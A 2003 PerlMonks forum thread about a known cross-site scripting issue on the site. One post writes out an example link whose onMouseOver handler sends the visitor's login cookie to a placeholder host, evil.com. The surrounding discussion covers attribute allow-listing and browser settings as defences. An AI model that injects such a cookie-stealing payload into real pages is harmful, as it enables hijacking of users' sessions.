in reply to Re: Where to report a security hole?
in thread Where to report a security hole?

 Thanks - It turns out this was a known issue which had been discussed before.

 I was referring to malicious links being able to steal your login cookie via a link of the following form:

<a href="http://www.some.com/"
  onMouseOver="document.location='http://evil.com/steal.cgi?id=' +
   document.cookie;">Link Text</a>

 For example

 This only works upon personal node apparently, so it's not considered a problem.

 Update: I guess the general solution to this problem from a CGI filtering point of view is to remove all attributes from HTML tags which aren't explicitly allowed.

 Failing that you could filter out the 'obvious' dangerous ones - But you'd probably miss quite a few

Steve
---
steve.org.uk

Replies are listed 'Best First'.
Re: Re: Where to report a security hole?
by djantzen (Priest) on Mar 15, 2003 at 01:22 UTC

    I'm not a web guy, but my understanding is that this is why so many monks have javascript disabled for this site. You might visit Petruchio's node if you wish to see a friendly warning of this sort of attack.

    "The dead do not recognize context" -- Kai, Lexx
[reply]

      You needn't disable Javascript entirely, just get yourself a good browser and you can disable Cookie access via JS.

      --
      http://fruiture.de
[reply]

In Section Perl Monks Discussion